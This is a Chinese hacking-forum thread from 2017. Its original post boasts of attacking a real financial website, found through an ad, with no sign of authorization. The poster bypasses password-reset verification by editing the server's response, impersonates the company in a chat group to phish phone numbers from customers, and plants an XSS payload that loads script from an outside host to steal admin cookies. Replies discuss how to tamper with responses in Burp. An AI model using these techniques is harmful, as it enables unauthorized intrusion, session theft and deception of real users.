[【通过】] 一次简单的渗透测试

[复制链接]
w7oami 发表于 2017-3-18 19:17:56 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 123

0x01: 渗透测试 某金融站:
那天无意在某2345 上看到了某金融站的广告:
就点开了某站测试。
飒飒.png
看了一下,不知道是什么系统。还是一个未知的系统。
也是老司机了,不可能拿上各种扫描器就开始BBB
近视了简单的信息搜集 得知。
真实IP  42.123.XX.XXX
系统为nginx
Php二次开发
当然这种估计 金融估计是找不到注入漏洞的,,
我就不用工具扫一波了。
2.png
一看网站对 XSS 估计没怎么过滤,
我就看见网站 有啥输出到后台的 点没有,
看到有个商城可以兑换,商品,实物,但是
333.png
好像需要积分,  我不可能自己花钱去 xxx吧。:
然后思路来了:
对网站进行了,一波 逻辑漏洞挖掘。
自己注册了了一个
里面功能还可以的,还有CSRF,但是没有啥卵用:
我们找回密码试试:
333333.png
好像只要一条验证码就行,,相信很多小伙伴想到了爆破:
但是我没有,我们抓包看看:
33333333333333.png
Session 为前端返回。这不是逻辑漏洞的征兆?
Info 验证码失败。 后门说false 失败。
修改false true 看看, true 为真即成功
3333333333333.png
好吧还是失败   但是前面的 返回值N 可能就是 他们公司验证码效验的规则 NNO 那么Y呢?
试试NY
33333333333333333333333.png
确定也需要抓包修改返回
可以看到成功: 登录也成功登录确认存在找回逻辑。   
那么问题来了: 说好了XSS呢?
别急我们去看商城,兑换都要积分,积分都是RMB 换。。哎
这时候搜集信息找着网站有积分的用户。。。   在网站内一无所获。。
那么我们来到。神奇的百度
33333333.png
第二天成功进入,:
果断,先把QQ头像改为他们金融的头像冒充下;
果断私聊:  你好我们平台 正在进行随机抽取投资客户进行奖励抽选,请提供下手机号:
虽然有点老套,效果还是不错,几分钟 拿到了20+手机号:
我觉得够的同时被发现了,果断自己退群,QQ
啊实打实.png
手机拍的   有点反光:
马上进入  地址测试 XSS:
用标签闭合  </></textarea>'"><scriptsrc=https://xxx.com /MxRFZF></script>
自己打下自己,可以;
R然后 找到实物,  积分的兑换 这里这么多多换几个 多打几次。:
第三天   驱蚊器无.png
成功打到后台cookie   
大多数的.png
一次 无脑的简单渗透 还望各位大牛指导!           
第一次写这么全  


评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

3ay0 发表于 2017-3-18 20:31:10 | 显示全部楼层

乞丐|主题 |帖子 |积分 -3

本帖最后由 F0r3c0de 于 2017-3-18 21:09 编辑

好像在哪看过 真的https://www.t00ls.net/thread-38650-1-1.html
小透明 发表于 2017-3-18 21:45:24 | 显示全部楼层

正式成员|主题 |帖子 |积分 153

我就说怎么这么熟悉 原来在t00ls看过?
管理05 发表于 2017-3-19 17:18:36 | 显示全部楼层

管理|主题 |帖子 |积分 936

投稿的时间比土司的发表时间要早一点
应该是一个人
QQ图片20170319171805.png
nearg1e 发表于 2017-3-20 12:08:40 | 显示全部楼层

正式成员|主题 |帖子 |积分 21


受教。

那个任意密码修改的漏洞,楼主说的有点奇怪,session为前端返回?搞不清楚程序是怎么实现的。
感觉提交手机号后,直接访问修改密码的url也可能成功。
要不就是js在收到status:Y时进行了什么操作。
不管怎么样,直接修改运行js代码也是能跳过来的。

另外产生的问题是:如何在浏览器运行中修改http返回? burp的话应该是不可行的才是,repeaters无法给浏览器的js处理,Intercept不能修改Response呀...

评分

参与人数 1酒票 +1 收起 理由
管理05 + 1 积极参与讨论

查看全部评分

路人  发表于 2017-3-22 15:09:36

正式成员|主题 |帖子 |积分 180

RE: 一次简单的渗透测试

老哥,QQ侧漏了。
Dik1s 发表于 2017-3-23 11:30:44 | 显示全部楼层

正式成员|主题 |帖子 |积分 2

RE: 一次简单的渗透测试

nearg1e 发表于 2017-3-20 12:08
受教。

那个任意密码修改的漏洞,楼主说的有点奇怪,session为前端返回?搞不清楚程序是怎么实现的。
...


burp是可以的 你把response打开就可以了   他说的session前端返回应该是session放在get请求里面而不是cookie里面吧,spring开发里面介绍说这样是为了防止某些用户不支持cookie所以才放在get请求里面。
nearg1e 发表于 2017-3-23 18:04:05 | 显示全部楼层

正式成员|主题 |帖子 |积分 21

RE: 一次简单的渗透测试

Dik1s 发表于 2017-3-23 11:30
burp是可以的 你把response打开就可以了   他说的session前端返回应该是session放在get请求里面而不是c ...

是指放在get请求的参数里面吗?  哦哦 是在proxy里面吗?
快速回复 返回顶部 返回列表